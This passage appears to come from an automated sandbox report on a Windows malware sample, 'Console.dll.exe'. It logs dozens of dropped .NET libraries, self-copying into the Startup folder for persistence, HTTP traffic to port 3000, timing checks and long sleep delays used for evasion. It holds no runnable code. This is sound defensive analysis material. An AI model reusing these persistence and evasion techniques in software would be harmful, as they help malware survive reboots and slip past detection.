            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_0CB4266C pushad ; iretd 0_2_0CB4266D
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_0CB4AF11 pushad ; iretd 0_2_0CB4AF12
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_0CB491EC push esp; retf 0_2_0CB491ED
            Source: C:\Users\user\Desktop\Console.dll.exe Code function: 0_2_0CB491E8 push esp; retf 0_2_0CB491E9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: 7_2_085CD9A4 push ebx; ret 7_2_085CD9A5
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: 7_2_085C6051 push ebx; ret 7_2_085C6052
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe Code function: 7_2_085CD288 push eax; retf 7_2_085CD289
            Source: System.Runtime.Numerics.dll.0.dr Static PE information: section name: .text entropy: 6.897846164158751
            Source: System.Collections.Immutable.dll.0.dr Static PE information: section name: .text entropy: 6.82698069539853
            Source: C:\Users\user\Desktop\Console.dll.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tracing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Serialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SqlClient.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebHeaderCollection.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.IsolatedStorage.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.ConfigurationManager.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.Common.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.Brotli.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.FileVersionInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Expressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Security.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Watcher.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.StackTrace.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.ReaderWriter.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Data.Sqlite.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\websocket-sharp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceProcess.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Sockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.CoreLib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Requests.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Timer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NetworkInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.ServicePoint.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Specialized.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Immutable.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Uri.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.RegularExpressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.EF6.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.CodeDom.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.DataContractSerialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebProxy.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.Client.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\mscorlib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Asn1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.DiagnosticSource.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encodings.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Channels.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.Local.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SuperSocket.ClientEngine.dllJump to dropped file

            Boot Survival

            Source: C:\Users\user\Desktop\Console.dll.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
            Source: C:\Users\user\Desktop\Console.dll.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe\:Zone.Identifier:$DATA

            Hooking and other Techniques for Hiding and Protection

            Source: unknown; Network traffic detected: HTTP traffic on port 49723 -> 3000
            Source: unknown; Network traffic detected: HTTP traffic on port 49816 -> 3000
            Source: C:\Users\user\Desktop\Console.dll.exe; Memory allocated: 3BC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Console.dll.exe; Memory allocated: 5CC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Console.dll.exe; Memory allocated: 5AE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe; Memory allocated: 50D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe; Memory allocated: 5400000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe; Memory allocated: 5130000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Console.dll.exe; Code function: 0_2_01229A40 rdtsc 0_2_01229A40
            Source: C:\Users\user\Desktop\Console.dll.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe; Window / User API: threadDelayed 389
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.JavaScript.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Permissions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WebSocket4Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Memory.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Thread.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.SystemEvents.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Tar.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.DataSetExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Claims.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Cng.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.ThreadPool.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NameResolution.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.NonGeneric.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Debug.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlSerializer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Calendars.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Algorithms.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Contracts.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Metadata.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.DataAnnotations.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLitePCLRaw.core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tracing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Annotations.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Serialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SqlClient.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebHeaderCollection.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.IsolatedStorage.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.ConfigurationManager.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.Common.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.Brotli.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.FileVersionInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Expressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Security.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Watcher.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.StackTrace.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.ReaderWriter.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Data.Sqlite.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\websocket-sharp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceProcess.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Sockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.CoreLib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Requests.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Timer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NetworkInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.ServicePoint.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Specialized.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Uri.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Immutable.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.RegularExpressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.EF6.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.CodeDom.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.DataContractSerialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebProxy.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.Client.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\mscorlib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Asn1.dllJump to dropped file
